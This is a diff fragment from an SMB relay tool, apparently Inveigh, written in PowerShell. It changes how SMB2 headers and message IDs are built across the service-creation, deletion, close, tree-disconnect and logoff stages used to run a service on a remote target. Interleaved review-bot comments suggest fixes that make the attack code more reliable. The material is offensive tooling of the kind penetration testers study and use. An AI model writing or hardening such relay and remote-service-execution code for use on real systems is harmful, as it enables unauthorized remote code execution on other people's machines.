Write-Verbose "Service $SMB_service created on $Target"
$SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
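Review bot: The service context handle is sliced from `$SMB_client_receive[112..131]` and the next request is immediately built with `$SMB2_message_ID++` without validating that the CreateServiceW response actually succeeded; if the SMB2 status or the SCM return code is non-zero those twenty bytes are not a handle, and the subsequent StartService/Delete/Close stages will be issued against garbage while a half-created service may be left on the target. A guard such as `if([BitConverter]::ToUInt32($SMB_client_receive,12) -ne 0){ Write-Output "[-] CreateServiceW failed on $Target"; $SMB_client_stage = 'CloseServiceHandle' }` before the handle extraction keeps the cleanup path reachable; the exact offset assumes the NetBIOS-framed buffer used elsewhere in Inveigh and should be confirmed. The enclosing stage block and the `if($SMB_signing)` branch continue outside this hunk.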
@@ -2551,9 +2565,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
Write-Output "Service $SMB_service failed to start on $Target"
}
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2595,7 +2608,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
if($SMB_close_service_handle_stage -eq 1)
{
Write-Verbose "Service $SMB_service deleted on $Target"
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage++
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
}
@@ -2606,8 +2619,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2641,9 +2653,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CloseRequest'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2675,8 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeDisconnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2716,9 +2726,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'Logoff'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2744,6 +2753,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
$SMB_client_stream.Flush()
$SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
}
}
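Review bot: The added `$SMB_client_stage = 'Exit'` is reached unconditionally after a single blocking `Read`, whose return value is discarded; a zero return means the peer already closed the socket and a target that never answers the Logoff stalls the relay loop on that read unless a `ReadTimeout` was set on the stream earlier in the function, which the hunk does not show. Capturing the count makes the teardown observable, e.g. `$SMB_logoff_bytes = $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)` followed by `if($SMB_logoff_bytes -eq 0){ Write-Verbose "[-] $Target closed the connection before the Logoff response" }`, and the stage can still move to 'Exit' either way. The 'Logoff' case and the surrounding switch start outside this hunk.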